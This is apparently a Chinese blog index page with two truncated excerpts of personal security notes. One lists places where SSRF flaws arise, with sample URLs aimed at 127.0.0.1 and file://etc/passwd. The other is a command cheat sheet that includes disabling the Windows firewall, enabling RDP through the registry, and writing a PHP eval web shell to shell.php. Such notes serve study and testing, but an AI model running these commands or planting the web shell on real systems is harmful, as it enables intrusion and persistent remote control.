ssrf笔记
ssrf漏洞出现点分享通过url 地址分享文章,例如如下地址:
http://share.xxx.com/index.?url=http://127.0.0.1
通过ur参数的获取来实现点击链接的时候跳到指定的分享文章。如果在此功能中没有对目标地址的范围做过滤与
限制则就存在着SSRF漏洞。
图片加载与下载通过URL地址加载或下载图片
http://image.xxx.com/image.php?image=http://127.0.0.1
图片加载存在于很多的编辑器中,编辑器上传图片处,有的是加载远程图片到服务器内。还有一些采用了加载远程图片的形式,本地文章加载了设定好的远程图片服务器上的图片地址,如果没对加载的参数做限制可能造成SSRF
图片、文章收藏功能http://title.xxx.com/title?title=file://etc/passwd
例如title参数是文章的标题地址,代表了一个文章的地址链接,请求后返回文章是否保存收藏的返回信息。如果保存,收藏功能采用了此种形式保存文章,则在没有限制参数的形式下可能存在SSRF.
代理服务,文件包含,多媒体加载,在线编程,站 ...
命令
推送到githubhexo g # generate生成hexo d # deploy 推送
windows#关闭防火墙和开启3389netsh firewall set opmode mode=disableREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f#windows查找win tasklist /svc /if查找到文件名然后搜索位置,#查找指定目录下指定文件名dir C:\ /s /b | find "example.txt"#bash写入一句话木马echo ^<? php @eval($_POST['123']); ?^> > shell.phpecho ^<? php @eval($_POST['123']);?^> >> shell.php#windows更新延长注册表H ...




